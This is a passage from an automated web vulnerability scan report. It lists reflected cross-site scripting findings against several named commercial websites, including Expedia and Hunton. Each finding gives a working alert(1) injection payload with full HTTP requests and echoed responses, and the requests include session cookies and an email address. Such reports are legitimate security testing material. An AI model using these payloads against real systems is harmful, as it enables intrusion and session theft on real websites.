User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 653
Set-Cookie: BIGipServerdhmweb_http_pool=2237947146.20480.0000; expires=Fri, 06-May-2011 20:40:49 GMT; path=/

function load2058797069() {
var load = window.open('http://950b13d4-72fe-46ca-891d-8922b0525b3e.dhmiservices.com/ClickContact/popup.aspx?var1=950b13d4-
...[SNIP]...
<img src=\"http://www.dhmiservices.com/ImageHandler.ashx?img_id=3824239be";alert(1)//e2bc96337d2\" border=\"0\" alt=\"Click to Call\"/>
...[SNIP]...
5.65. http://www.dhmiservices.com/ImageHandler.ashx [img_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dhmiservices.com
Path:   /ImageHandler.ashx

Issue detail

The value of the img_id request parameter is copied into the HTML document as plain text between tags. The payload e1fbf<script>alert(1)</script>cf716ce4fbd was submitted in the img_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ImageHandler.ashx?img_id=3824e1fbf<script>alert(1)</script>cf716ce4fbd HTTP/1.1
Host: www.dhmiservices.com
Proxy-Connection: keep-alive
Referer: http://www.agentadvantage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 118
Set-Cookie: BIGipServerdhmweb_http_pool=2237947146.20480.0000; expires=Fri, 06-May-2011 20:40:26 GMT; path=/

Conversion failed when converting the nvarchar value '3824e1fbf<script>alert(1)</script>cf716ce4fbd' to data type int.
5.66. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dominionenterprises.com
Path:   /main/do/businesses/id/13/category/For%20Businesses

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7db69<img%20src%3da%20onerror%3dalert(1)>eafdbdd941c was submitted in the REST URL parameter 7. This input was echoed as 7db69<img src=a onerror=alert(1)>eafdbdd941c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /main/do/businesses/id/13/category/For%20Businesses7db69<img%20src%3da%20onerror%3dalert(1)>eafdbdd941c HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/For_Businesses
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725177227:ss=1304725152629; s_nr=1304725179971; s_lv=1304725179971; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:40:25 GMT
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:40:25 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=f83cff2dc826eeb8b7b7b1111afdbdaf3a05433071c0aed34dc444639c5eca8583c4cdbd; Path=/
Content-Length: 23235

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Businesses</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equi
...[SNIP]...
<img_src/a_onerror/alert(1)>eafdbdd941c';">
                           FOR BUSINESSES7DB69<IMG SRC=A ONERROR=ALERT(1)>EAFDBDD941C
                       </div>
...[SNIP]...
5.67. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dominionenterprises.com
Path:   /main/do/businesses/id/13/category/For%20Businesses

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bde62"><a>f053602bd88 was submitted in the REST URL parameter 7. This input was echoed as bde62\"><a>f053602bd88 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /main/do/businesses/id/13/category/For%20Businessesbde62"><a>f053602bd88 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/For_Businesses
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725177227:ss=1304725152629; s_nr=1304725179971; s_lv=1304725179971; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:40:19 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:40:19 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 23191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Businesses</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equi
...[SNIP]...
<div class="secondary_nav_item" style=" color:#000000; font-size:12px; font-weight:bold; padding-left:18px;" onclick="window.location.href='http://www.dominionenterprises.com/main/do/For_Businessesbde62\"><a>f053602bd88';">
...[SNIP]...
5.68. http://www.expedia.com/pub/agent.dll [date1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The value of the date1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d43e'%3balert(1)//b4e195f70d4 was submitted in the date1 parameter. This input was echoed as 5d43e';alert(1)//b4e195f70d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=5d43e'%3balert(1)//b4e195f70d4&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:38:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX0135D23A61$F4$B5202000V$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$38zo$D7wYd$94$82$AB$89$FB!e02000`125; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819498`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 109469

<!-- srvpush1 15:38:22(:749) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
t.value=d;
   f.rfrr.value=r;
   f.frtp.value=t;
   f.fcqp.value=q
   f.submit();
   }
   
   function SubmitRdat(q,d,t)
   {
   ResetFltWiz();
   f.qscr.value='flxc';
   f.mnth.value='5/1/2011';
   f.ddat.value='5d43e';alert(1)//b4e195f70d4';
   f.fcqp.value=q;
   f.rdat.value=d;
   if(q)
   f.rfrr.value="-22530";
   else
   f.rfrr.value="-22531";
   f.frtp.value=t;
   f.submit();
   }
   function StartOver()
   {
   f.subm.value= '';
   f.qscr.value
...[SNIP]...
5.69. https://www.expedia.com/pub/agent.dll [selc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The value of the selc request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 83116%3balert(1)//53dd1085a0b was submitted in the selc parameter. This input was echoed as 83116;alert(1)//53dd1085a0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pub/agent.dll?qscr=logi&ussl=1&subl=0&lmde=256&selc=383116%3balert(1)//53dd1085a0b&rfrr=-54397&zz=1304739868950 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=litn&&chms=114164&rfrr=-54397&zz=1304739862204
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`0`minfo=v.5,EX01068F4DDA$F0$24$DD$0C$3E$0C$2F$1E$C5mR$39$18$13mj$26X$82$16u$F6$EC$5F$9E$C2$5C$C2$27$34$5B$7D$FC$35$F4$0D$2C$8E$21E6L$A4RS$B1$CF9`accttype=v.2,8,1,EX01191EC1D2$F0$24$DD$0C$23$0C$37$1E$CDmZ$39$19$14m$60$26X$83$17$7C$F4$DE$5F$9E`user=v.8,0,EX01CED44CE7p$B7203000$8B$27$E96$B8$60$9D$0D$B8$60$9D$0D$B8$60$9D$0D10001000$1E810$2302!50$9F9o$98X!2$3F$BC$D6$EF$B2u!e02000`378; p1=`gacct=v.1,1,215819496`tpid=v.1,1`group=v.1,0`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`adinf=v.1,215819505|999|1|874F787A276C|||`141

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:51:25 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 97453


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
(i==c&&ef)Foci(ef);
   }
   g_currSel=c;
   }
   }
   
   function SHErr(c)
   {
   var e=getObj("choice1errorid");
   if(e)e.style.display=(1!=c)?"none":"block";
   }
   function SelOptOnLoad()
   {
   selectOne(383116;alert(1)//53dd1085a0b);
   
   }AddLoadFn("SelOptOnLoad()");
//-->
...[SNIP]...
5.70. http://www.ezflexplan.com/navigation/frameset.asp [content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Issue detail

The value of the content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e5ba"><script>alert(1)</script>b96358f5505 was submitted in the content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=4e5ba"><script>alert(1)</script>b96358f5505 HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 962
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
<frame name="leftnav" src="/ContentPages/nav_4e5ba"><script>alert(1)</script>b96358f5505" marginwidth="0" marginheight="0"
scrolling="auto" frameborder="no">
...[SNIP]...
5.71. http://www.ezflexplan.com/navigation/frameset.asp [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1212"><script>alert(1)</script>9703c6d326e was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/frameset.asp?id=lbmc&email=d1212"><script>alert(1)</script>9703c6d326e&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 866
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
<frame name
src="/navigation/menu.asp?id=lbmc&amp;email=d1212"><script>alert(1)</script>9703c6d326e&amp;content=employers%2Ehtml"
marginwidth="0" marginheight="0" scrolling="no" frameborder="no"
style="text-align: Left">
...[SNIP]...
5.72. http://www.ezflexplan.com/navigation/frameset.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/frameset.asp

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 113a5"><script>alert(1)</script>cc1a308a602 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/frameset.asp?id=113a5"><script>alert(1)</script>cc1a308a602&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/lbmc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 892
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan</title>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<frameset border="0" fr
...[SNIP]...
<frame name
src="/navigation/menu.asp?id=113a5"><script>alert(1)</script>cc1a308a602&amp;email=tmangrum@lbmc.com&amp;content=employers%2Ehtml"
marginwidth="0" marginheight="0" scrolling="no" frameborder="no"
style="text-align: Left">
...[SNIP]...
5.73. http://www.ezflexplan.com/navigation/menu.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezflexplan.com
Path:   /navigation/menu.asp

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7284e"><script>alert(1)</script>0b95bf251de was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /navigation/menu.asp?id=lbmc7284e"><script>alert(1)</script>0b95bf251de&email=tmangrum@lbmc.com&content=employers%2Ehtml HTTP/1.1
Host: www.ezflexplan.com
Proxy-Connection: keep-alive
Referer: http://www.ezflexplan.com/navigation/frameset.asp?id=lbmc&email=tmangrum%40lbmc%2Ecom&content=employers%2Ehtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQSRSARR=JOCFNNCCLDANILAGDNPIOKAL

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3118
Content-Type: text/html
Cache-control: private


<html>

<head>
<title>EzFlexPlan Menu</title>
<script LANGUAGE="JavaScript">


//HoverCraft MouseOver Script


if (document.images)


{


var ImageDirectory = "../
...[SNIP]...
<a href="/navigation/contact_us.asp?id=lbmc7284e"><script>alert(1)</script>0b95bf251de&email=tmangrum%40lbmc%2Ecom&content=contact_us.asp"
onclick="parent.frames[1].location='/ContentPages/nav_contact_us.html'"
target="mainbody" onmouseover="HoverCraft('Image3', Image3On.src);"
onmou
...[SNIP]...
5.74. http://www.hunton.com/aboutus/uniGC.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /aboutus/uniGC.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b3304<script>alert(1)</script>126556c9ed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutus/uniGC.aspx?xpST=AboutUs&b3304<script>alert(1)</script>126556c9ed9=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.3.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:25 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1844; path=/
Set-Cookie: PortletId=5981402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/aboutus/uniGC.aspx?xpST=AboutUs&b3304<script>alert(1)</script>126556c9ed9=1&pdf=yes</div>
...[SNIP]...
5.75. http://www.hunton.com/alan_kailer/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /alan_kailer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d7874<script>alert(1)</script>67ed776ea04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alan_kailer/?d7874<script>alert(1)</script>67ed776ea04=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
